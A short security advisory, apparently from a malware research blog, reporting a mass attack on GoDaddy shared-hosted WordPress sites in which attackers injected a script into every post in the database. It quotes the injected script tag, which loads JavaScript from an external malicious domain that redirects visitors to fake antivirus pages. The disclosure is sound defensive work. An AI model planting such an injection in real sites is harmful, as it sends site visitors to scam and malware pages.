For the last few days we’ve tracking another large scale attack against GoDaddy shared-hosted sites. GoDaddy has been a target for a while, with mass infections happening often.
This time, the attackers changed tactics and instead of infecting the PHP files, they injected malicious code inside the database. On the WordPress infected sites, they added the following javascript inside every post (on the wp_posts table):
<script src= "http://acrossuniverseitbenet.com/js.php?kk=10″></script>
As you can imagine, this javascript redirects the user to the infamous “Fake AV” pages:
Read More
Comments